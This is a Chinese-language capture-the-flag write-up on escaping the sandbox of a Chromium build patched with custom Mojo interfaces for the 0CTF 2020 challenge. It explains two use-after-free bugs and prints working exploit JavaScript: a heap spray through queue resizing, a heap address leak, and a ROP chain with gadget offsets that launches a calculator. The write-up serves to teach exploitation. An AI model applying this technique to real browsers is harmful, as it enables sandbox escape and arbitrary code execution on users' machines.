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沙箱逃逸之0ctf 2020 chrome_sbx writeup
0ctf 2020浏览器漏洞利用第二篇
`0ctf`上`chrome`系列题目的第二题,承接[上一篇](https://f0cus77.github.io/%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E4%B9%8B0ctf2020-chromium_rce-writeup/)分析文章,利用`Mojo`进行沙箱逃逸。 描述 -- 题目附件: ```bash $ ls Dockerfile NOTE chrome.zip chromium_sbx.diff flag.txt flag_printer mojo_js.zip run.sh server.py visit.sh ``` `visit.sh`中`--enable-blink-features=MojoJS`表示在`JS`中可以使用`MojoJS`的功能。 ```bash timeout 30 ./chrome --headless --disable-gpu --remote-debugging-port=1338 --enable-blink-features=MojoJS "$1" ``` 其它的没有啥可以看的,不用想肯定是在`chromium_sbx`中自定义了`Mojo`接口,所以直接去看`diff`文件就可以了。 分析 -- ### diff 分析 先去看`mojom`文件,可以看到它实现了两个接口,分别是`TStorage`以及`TInstance`。 ```diff +module blink.mojom; + +interface TStorage { + Init() => (); + CreateInstance() => (pending_remote instance); + GetLibcAddress() => (uint64 addr); + GetTextAddress() => (uint64 addr); +}; + +interface TInstance { + Push(uint64 value) => (); + Pop() => (uint64 value); + Set(uint64 index, uint64 value) => (); + Get(uint64 index) => (uint64 value); + SetInt(int64 value) => (); + GetInt() => (int64 value); + SetDouble(double value) => (); + GetDouble() => (double value); + GetTotalSize() => (int64 size); +}; ``` 先看`TStorageImpl`的声明与实现,声明如下: ```diff +namespace content { + + class CONTENT_EXPORT TStorageImpl + : public blink::mojom::TStorage { + public: + TStorageImpl(); + ~TStorageImpl() override; + static void Create(mojo::PendingReceiver receiver); + + base::WeakPtr AsWeakPtr(); + + // TStorage mojom interface + void Init(InitCallback callback) override; + void CreateInstance(CreateInstanceCallback callback) override; + void GetLibcAddress(GetLibcAddressCallback callback) override; + void GetTextAddress(GetTextAddressCallback callback) override; + + std::unique_ptr inner_db_; + base::WeakPtrFactory weak_factory_; + }; + +} // namespace content ``` 可以看到它有四个成员函数,待会在实现中再好好分析。先看它的成员变量,分别是`inner_db_`以及`weak_factory_`。其中`inner_db_`是`InnerDbImpl`类。 因为`InnerDbImpl`类是上面两个接口类实现的基础,所以先去看它的声明与实现,声明如下所示。 ```diff +namespace content { + class InnerDbImpl : InnerDb { + public: + InnerDbImpl(); + ~InnerDbImpl() override; + + void Push(uint64_t value); + uint64_t Pop(); + void Set(uint64_t index, uint64_t value); + uint64_t Get(uint64_t index); + void SetInt(int64_t value); + int GetInt(); + void SetDouble(double value); + double GetDouble(); + uint64_t GetTotalSize() override; + + std::array array_; + base::queue queue_; + int64_t int_value_ = 0; + double double_value_ = 0.0; + }; +} ``` 可以看到它有四个成员变量: - 大小为`200`的`int64_t`数组`array_`; - 存储`int64_t`的队列`queue_`; - 存储`int64_t`的`int`值`int_value_`; - 存储浮点数的`double_value_`。 其中`Push`与`Pop`是用来从队列`queue_`中压入与弹出数据;`Get`与`Set`则是在对应的数组`array_`中获取及存入对应`index`的数据;`GetInt`及`SetInt`是设置变量`int_value_`的值;`SetDouble`与`GetDouble`是设置相应浮点数的值;`GetTotoalSize`则是返回数组`array_`及队列`queue_`大小的总和。 再来看`TStorageImpl`类的实现,如下所示: ```diff +namespace content { + +TStorageImpl::TStorageImpl() : weak_factory_(this) {} + +// static +void TStorageImpl::Create(mojo::PendingReceiver receiver) { + mojo::MakeSelfOwnedReceiver(std::make_unique(), + std::move(receiver)); +} + +TStorageImpl::~TStorageImpl() {} + +base::WeakPtr +TStorageImpl::AsWeakPtr() { + return weak_factory_.GetWeakPtr(); +} + +void TStorageImpl::Init(InitCallback callback) { + inner_db_ = std::make_unique(); + + std::move(callback).Run(); +} + +void TStorageImpl::CreateInstance(CreateInstanceCallback callback) { + mojo::PendingRemote instance; + mojo::MakeSelfOwnedReceiver(std::make_unique(inner_db_.get()), + instance.InitWithNewPipeAndPassReceiver()); + + std::move(callback).Run(std::move(instance)); +} + +// NOTE: On Windows platform, binary and library address of chrome main process is same +// as renderer process, so we suppose you already have these addresses in SBX challenge. +// In fact, even without these two functions, you can also solve this problem, but I don't +// think it's friendly to players in a 48-hour game. Maybe you can try it after the match :) +void TStorageImpl::GetLibcAddress(GetLibcAddressCallback callback) { + std::move(callback).Run((uint64_t)(&atoi)); +} +void TStorageImpl::GetTextAddress(GetTextAddressCallback callback) { + std::move(callback).Run((uint64_t)(&TStorageImpl::Create)); +} + +} ``` `Init`函数调用`std::make_unique()`初始化创建了`inner_db_`;`CreateInstance`调用`std::make_unique`创建`TInstance`实例,参数是调用`inner_db_.get()`所获取的指针。然后调用`MakeSelfOwnedReceiver`与`mojo`实例绑定,也就是说即使`TStorageImpl`实例被释放了,只要`mojo`句柄没关闭,`TInstanceImpl`实例就不会被释放。 `GetLibcAddress`顾名思义,会返回`atoi`函数的地址;`GetTextAddress`则是返回`TStorageImpl::Create`函数的地址,这两个函数是为了简化题目的难度,直接给了地址泄露,没有其它的功能。 `TStorageImpl`分析完了,我们再来看`TInstanceImpl`的声明与实现,声明如下所示。 ```diff +namespace content { + + class CONTENT_EXPORT TInstanceImpl + : public blink::mojom::TInstance { + public: + TInstanceImpl(InnerDbImpl* db); + ~TInstanceImpl() override; + + base::WeakPtr AsWeakPtr(); + + // TInstance mojom interface + void Push(uint64_t value, PushCallback callback) override; + void Pop(PopCallback callback) override; + void Set(uint64_t index, uint64_t value, SetCallback callback) override; + void Get(uint64_t index, GetCallback callback) override; + void SetInt(int64_t value, SetIntCallback callback) override; + void GetInt(GetIntCallback callback) override; + void SetDouble(double value, SetDoubleCallback callback) override; + void GetDouble(GetDoubleCallback callback) override; + void GetTotalSize(GetTotalSizeCallback callback) override; + + InnerDbImpl* inner_db_ptr_; + base::WeakPtrFactory weak_factory_; + }; + +} // namespace content ``` 可以看到也有个成员变量是`inner_db_ptr_`。其余的成员函数则是调用`InnerDbImpl`类中对应的函数。 ### 漏洞分析 根据出题人的[wp](https://dmxcsnsbh.github.io/2020/07/20/0CTF-TCTF-2020-Chromium-series-challenge/),这题有两个漏洞,一个是预期的漏洞,一个是非预期漏洞,这里两个漏洞都讲一讲。 漏洞的主要成因是在构建`TInstance`实例的时候,参数对象使用的是`inner_db_.get()`来进行获取, ```diff +void TStorageImpl::CreateInstance(CreateInstanceCallback callback) { + mojo::PendingRemote instance; + mojo::MakeSelfOwnedReceiver(std::make_unique(inner_db_.get()), + instance.InitWithNewPipeAndPassReceiver()); + + std::move(callback).Run(std::move(instance)); +} ``` `unique_ptr`如果调用`get`函数获取指针的话,则`get`的返回值就不再是智能指针,`unique_ptr`被释放后,`get`返回的值就很容易形成`uaf`。如`p = bar.get()`,`bar`是一个智能指针,`p`是一个普通指针。`p = bar.get()`,`bar`并非被释放,也就相当于指针`p`和智能指针`bar`共同管理一个对象,所以就`*p`做的一切,都会反应到`bar`指向的对象上。而且如果`bar`被释放而`p`没被释放的话,就会出现`UAF`漏洞。 漏洞一是在创建`TInstance`实例的时候,调用`inner_db_.get()`作为参数,同时调用`mojo::MakeSelfOwnedReceiver`将`TInstanceImpl`生命周期与`mojo`所绑定,此时如果我们释放`TStorageImpl`对象,它的成员变量`inner_db_`会被释放。然后因为`Mojo`没有关闭,此时`TInstance`仍然有效,`inner_db_.get()`获取的指针仍然可以使用,然而`inner_db_`已经被释放了,我们可以通过`TInstance`来操作已经被释放的内存,形成`uaf`漏洞。 最终形成的`poc`如下: ```js async function poc() { let tStoragePtr = new blink.mojom.TStoragePtr(); Mojo.bindInterface( blink.mojom.TStorage.name, mojo.makeRequest(tStoragePtr).handle, ); // malloc innerdb tStoragePtr.init(); // get TInstance ptr let tInstancePtr = (await tStoragePtr.createInstance()).instance; // free the innerdb ptr by free tStoragePtr tStoragePtr.ptr.reset(); // still call freed innerdb by tInstangcePTr. await tInstancePtr.getTotalSize(); } ``` 这个方法不是出题人的意思,出题人的本意是漏洞二。即通过两次调用`Init`函数来形成`UAF`漏洞,及在调用`TStorageImpl::Init`初始化`inner_db_`以后;再调用`TStorageImpl::CreateInstance`来创建`TInstance`;然后再调用`TStorageImpl::Init`函数再次申请`inner_db_`,此时智能指针会自动释放之前的对象内存;然而该内存在创建`TInstance`已经被作为参数传入了,因此后续使用`TInstance`仍然可以使用被释放的内存,形成`uaf`漏洞。 `poc`代码如下: ```js async function poc() { let tStoragePtr = new blink.mojom.TStoragePtr(); Mojo.bindInterface( blink.mojom.TStorage.name, mojo.makeRequest(tStoragePtr).handle, ); // malloc innerdb tStoragePtr.init(); // get TInstance ptr let tInstancePtr = (await tStoragePtr.createInstance()).instance; // free the innerdb ptr by free malloc innerdb again tStoragePtr.init(); // still call freed innerdb by tInstangcePTr. await tInstancePtr.getTotalSize(); } ``` 利用 -- 上面漏洞已经分析清楚了,现在再来说说利用的事。 首先要解决的是`uaf`所释放的内存`InnerDbImpl`有多大,以及我们如何可以使用可控的内存来控制它。 我们可以将断点下在`TStorageImpl::Init`,得到如下的代码。可以看到`InnerDbImpl`的大小是`0x678`。 ```asm 0x555558f0a0b8 push rbx 0x555558f0a0b9 push rax 0x555558f0a0ba mov r14, rsi 0x555558f0a0bd mov r15, rdi 0x555558f0a0c0 mov edi, 0x678 ► 0x555558f0a0c5 call 0x55555ae3d9f0 <0x55555ae3d9f0> 0x555558f0a0ca mov rbx, rax 0x555558f0a0cd mov rdi, rax 0x555558f0a0d0 call content::InnerDbImpl::InnerDbImpl() ``` 另一个就是释放`0x678`大小的内存以后,我们怎样再将它申请出来。之前做的题都可以申请任意大小的内存,然而在这里所有的内存大小都是固定的,只有整数队列`queue_`可能可以发生变化。参考的文章是[0CTF/TCTF 2020 Quals Chromium SBX](https://mem2019.github.io/jekyll/update/2020/07/03/TCTF-Chromium-SBX.html)里的方法,确实很巧妙。总的来来说是通过扩大可控的`queue_`来实现任意内存的分配。 具体来说`push_front`以及`pop_front`的扩大内存分配以及缩小内存分配的函数是`ExpandCapacityIfNecessary`以及`ShrinkCapacityIfNecessary` ```c++ // --- push --- void push_front(const T& value) { emplace_front(value); } template reference emplace_front(Args&&... args) { ExpandCapacityIfNecessary(1); // the function used to expand buffer, // which we care about because this affect the size of buffer allocated // ... do the actual push, which we don't care } // --- pop --- void pop_front() { // ... actual poping operation, which we don't care ShrinkCapacityIfNecessary(); // the function used to shrink the capacity, which is buffer size, // so we care about this function // ... } ``` 再深跟一步可以知道,`push`的过程中,当内存不足时,它会将内存扩展至`std::max(min_new_capacity, capacity() + capacity() / 4)`,即当前内存为`x`,会将内存扩展为`man(x+1, 5/4*x)`;当空余的内存大于一半时(`empty_spaces < sz`),此时内存需要缩小,它会将内存缩小至(`sz + sz / 4`,`sz`为当年内存),因为内存在小于一半才缩小,因为`sz=1/2*x`,所以缩小时,内存会缩小至`5/8*x` ```c++ // Expands the buffer size. This assumes the size is larger than the // number of elements in the vector (it won't call delete on anything). void SetCapacityTo(size_t new_capacity) { // Use the capacity + 1 as the internal buffer size to differentiate // empty and full (see definition of buffer_ below). VectorBuffer new_buffer(new_capacity + 1); // using VectorBuffer = internal::VectorBuffer; // if we look at implementation of VectorBuffer, this will allocate // `(new_capacity + 1) * sizeof(T)` bytes of memory. // since our queue element type is uint64_t, sizeof(T) is 8. // thus to allocate 0x678 bytes, // we need to let new_capacity=(0x678/8)-1=206 MoveBuffer(buffer_, begin_, end_, &new_buffer, &begin_, &end_); buffer_ = std::move(new_buffer); } void ExpandCapacityIfNecessary(size_t additional_elts) { size_t min_new_capacity = size() + additional_elts; if (capacity() >= min_new_capacity) return; // Already enough room. min_new_capacity = std::max(min_new_capacity, internal::kCircularBufferInitialCapacity); // in our case, min_new_capacity > internal::kCircularBufferInitialCapacity // when this line is reached, // because kCircularBufferInitialCapacity is the initial capacity, 3 // std::vector always grows by at least 50%. WTF::Deque grows by at least // 25%. We expect queue workloads to generally stay at a similar size and // grow less than a vector might, so use 25%. size_t new_capacity = std::max(min_new_capacity, capacity() + capacity() / 4); // grow 25% each time, but we need to at least grow to min_new_capacity SetCapacityTo(new_capacity); } void ShrinkCapacityIfNecessary() { // Don't auto-shrink below this size. if (capacity() <= internal::kCircularBufferInitialCapacity) return; // Shrink when 100% of the size() is wasted. // namely only shrink when size <= empty_space size_t sz = size(); size_t empty_spaces = capacity() - sz; if (empty_spaces < sz) return; // Leave 1/4 the size as free capacity, not going below the initial // capacity. size_t new_capacity = std::max(internal::kCircularBufferInitialCapacity, sz + sz / 4); // since `sz` is around `capacity/2`, // so capacity is shrinked to around `5/8` of the original capacity if (new_capacity < capacity()) { // Count extra item to convert to internal capacity. SetCapacityTo(new_capacity); } } ``` 因此我们如果想要申请`0x678`大小的内存,就可以通过`push`和`pop`的顺序来达成目的。这个顺序可以通过爆破的方式来最终实现,代码如下所示: ```python from random import * def run(): x = 10 # we start at 10, because 10 is the capacity value # that +1/4 operation starts to play the expanding role ways = [] while x < 207: b = random() > 0.1 # we want more expand ways.append(b) if b: # mimic expand operation x = int(max(x + 1, x + x / 4)) else: # mimic shrink operation x = x / 2 x += x / 4 print (x) if x == 206: print "!!!" # notify when 206 is reached return True print ways return False while (not run()): pass ``` 我多运行了几次,挑选了一个看起来还比较少的序列来进行实现。 ```bash 12 15 18 22 27 33 41 51 63 78 48 60 75 93 57 71 88 55 68 85 106 132 165 206 !!! ``` 还需要知道一点的是`queue`的内存结构,如下所示。`queue`对象占用大小为`4`个内存,在未存储数据时四个字段均为`0`。初始化后第一个字段指向分配的内存大小;第二个字段存储为`queue`内存空间大小,最后一个字段则是目前已使用的空间大小。 ```php before init: container capacity - | 0x000000000000 | 0x000000000000 | - | 0x000000000000 | 0x000000000000 | front rear | | after first push | | +------------+ | | | v | container capacity | - | 0x1f15101a3440 | 0x000000000004 | | - | 0x000000000000 | 0x000000000001 | | front rear | +--> 0x1f15101a3440(heap): - | arr[0] | hole | hole | hole | ``` 因为我们可控`inner_db_`对象,该对象中有`queue`对象,如果我们`uaf`控制该对象,通过伪造`inner_db_`中的`queue`对象中的数据结构,我们也可以实现任意地址读写。 具体的利用过程如下: 1. 利用先获取`glibc`以及程序基址 ```js let tStoragePtr = new blink.mojom.TStoragePtr(); Mojo.bindInterface( blink.mojom.TStorage.name, mojo.makeRequest(tStoragePtr).handle, ); // malloc innerdb tStoragePtr.init(); // get TInstance ptr let tInstancePtr = (await tStoragePtr.createInstance()).instance; // leak addr let atoiAddr = (await tStoragePtr.getLibcAddress()).addr; let textAddr = (await tStoragePtr.getTextAddress()).addr; let libcBaseAddr = BigInt(atoiAddr) - 0x47730n; let textBaseAddr = BigInt(textAddr) - 0x39b5e60n; console.log("[+]libc base addr: "+hex(libcBaseAddr)); console.log("[+]text base addr: "+hex(textBaseAddr)); ``` 2. 触发漏洞,并利用`queue`队列占用该内存,占用该内存后,利用`innerdb->getInt`方法找到对应的被释放的对象: ```js // free the innerdb ptr by free tStoragePtr tStoragePtr.ptr.reset(); // trying to occupy the innerdb memory by queue memeory for(let i=0; i<0x5; i++) { for(let j=0; j<78-10; j++) { // should push 0, which represent the innerdb's queue is null await sprayTIPtrArr[i].push(0x0n) }; // can use getInt function to debug( check the memory layout ) // await sprayTIPtrArr[0].getInt(); for(let j=0; j<78/2; j++) { await sprayTIPtrArr[i].pop(); } for(let j=0; j<93-78/2; j++) { await sprayTIPtrArr[i].push(0x0n); } // await sprayTIPtrArr[0].getInt(); for(let j=0; j<93/2; j++) { await sprayTIPtrArr[i].pop(); } for(let j=0; j<88-93/2; j++) { await sprayTIPtrArr[i].push(0x0n); } for(let j=0; j<88/2; j++) { await sprayTIPtrArr[i].pop(); } for(let j=0; j<206-88/2-1; j++) { await sprayTIPtrArr[i].push(0x0n); } // await sprayTIPtrArr[0].getInt(); await sprayTIPtrArr[i].push(BigInt(i)); } // get the idx to see which one occupy the innerdb memory let evilTIIdx = (await tInstancePtr.getInt()).value; let evilTIPtr = sprayTIPtrArr[evilTIIdx]; console.log("[+] the evil idx: "+hex(evilTIIdx)); ``` 3. 因为占用的内存`queue`字段被初始化为`0`,此时我们再进行`push`重新分配内存,此时可泄露堆地址: ```js // malloc queue ptr in freed innerdb memory; for(let i=0; i<0x80/8; i++) { await tInstancePtr.push(0x41414141n+BigInt(i)); } // await tInstancePtr.getInt(); // leak the upper queue ptr, now the innerdb will be freed again let leakHeapAddr = -1n; for (let i=0; i<207; i++) { let tmp = (await evilTIPtr.pop()).value; if (leakHeapAddr == -1 && tmp != 0) { leakHeapAddr = BigInt(tmp); } } console.log("[+] leak heap addr: "+hex(leakHeapAddr)); ``` 4. 有了堆地址就有了`rop`链存储的目标地址,构造`rop`链,并伪造`queue`指针将`rop`链写入到目标内存: ```js // trying to occupy again. for(let i=5; i<10; i++) { for(let j=0; j<78-10; j++) { await sprayTIPtrArr[i].push(0n) }; // await sprayTIPtrArr[0].getInt(); for(let j=0; j<78/2; j++) { await sprayTIPtrArr[i].pop(); } for(let j=0; j<93-78/2; j++) { await sprayTIPtrArr[i].push(leakHeapAddr); } // await sprayTIPtrArr[0].getInt(); for(let j=0; j<93/2; j++) { await sprayTIPtrArr[i].pop(); } for(let j=0; j<88-93/2; j++) { await sprayTIPtrArr[i].push(0n); } for(let j=0; j<88/2; j++) { await sprayTIPtrArr[i].pop(); } for(let j=0; j<202-88/2-1; j++) { await sprayTIPtrArr[i].push(0n); } // await sprayTIPtrArr[0].getInt(); // put the queue pointer back which will be put with rop chain await sprayTIPtrArr[i].push(leakHeapAddr); await sprayTIPtrArr[i].push(BigInt(0x13)); await sprayTIPtrArr[i].push(BigInt(0)); await sprayTIPtrArr[i].push(BigInt(0)); await sprayTIPtrArr[i].push(BigInt(i)); } // get the idx evilTIIdx = (await tInstancePtr.getInt()).value; evilTIPtr = sprayTIPtrArr[evilTIIdx]; console.log("[+] the evil idx: "+hex(evilTIIdx)); // prepare the rop chain let execvp = textBaseAddr + 0x0000000a1b88d0n // : let xchgRaxRsp = textBaseAddr + 0x0000000007fde8e4n; //: xchg rax, rsp ; ret let popRdi = textBaseAddr + 0x0000000002e9ee1dn; //: pop rdi ; ret let popRdiRsi = textBaseAddr + 0x0000000003c320fdn // : pop rdi ; pop rsi ; ret let popRsi = textBaseAddr + 0x0000000002f49c6en; //: pop rsi ; ret let popRdx = textBaseAddr + 0x0000000002ea5d72n; // : pop rdx ; ret let binshAddr = leakHeapAddr + 0x50n; let ropBufferSize = 0x80; let ropBuffer = new ArrayBuffer(ropBufferSize); let ropData64 = new BigUint64Array(ropBuffer); let ropDataView = new DataView(ropBuffer); // size vatable offset in vtable is 0x10; ropDataView.setBigInt64(0x10,xchgRaxRsp,true); ropDataView.setBigInt64(0x0, popRdiRsi, true); ropDataView.setBigInt64(0x8, binshAddr, true); ropDataView.setBigInt64(0x18, popRsi, true); ropDataView.setBigInt64(0x20, 0n, true); ropDataView.setBigInt64(0x28, popRdx, true); ropDataView.setBigInt64(0x30, 0n, true); ropDataView.setBigInt64(0x38, popRdx, true); ropDataView.setBigInt64(0x40, 0n, true); ropDataView.setBigInt64(0x48, execvp, true); // ropDataView.setBigInt64(0x50, 0x68732f6e69622fn,true); // /bin/sh ropDataView.setBigInt64(0x50, 0x6f6e672f6e69622fn,true); // /bin/gno ropDataView.setBigInt64(0x58, 0x75636c61632d656dn,true); // me-calcu ropDataView.setBigInt64(0x60, 0x726f74616cn,true); // lator\x00 // deploy the rop chain for(let i=0; i<0x80/8; i++) { await tInstancePtr.push(ropData64[i]); } } ``` 5. 触发虚表函数,执行`rop`链,成功弹出计算器: ```js // trigger rop by call vtable function. await tInstancePtr.getTotalSize(); ``` 需要说的一点是,因为可以通过伪造`queue`对象实现任意地址读写,所以这里也可以不用泄露堆地址,而是直接将`rop`链写到`bss`段,这样也是可行的。 总结 -- 通过这题进一步巩固了`mojo uaf`的做法,通过`push`和`pop`来申请特定内存的方法也确实是巧妙,学到了。 参考 -- - [0CTF/TCTF 2020 Quals Chromium SBX](https://mem2019.github.io/jekyll/update/2020/07/03/TCTF-Chromium-SBX.html) - [0CTF/TCTF 2020 Chromium series challenge](https://dmxcsnsbh.github.io/2020/07/20/0CTF-TCTF-2020-Chromium-series-challenge/)
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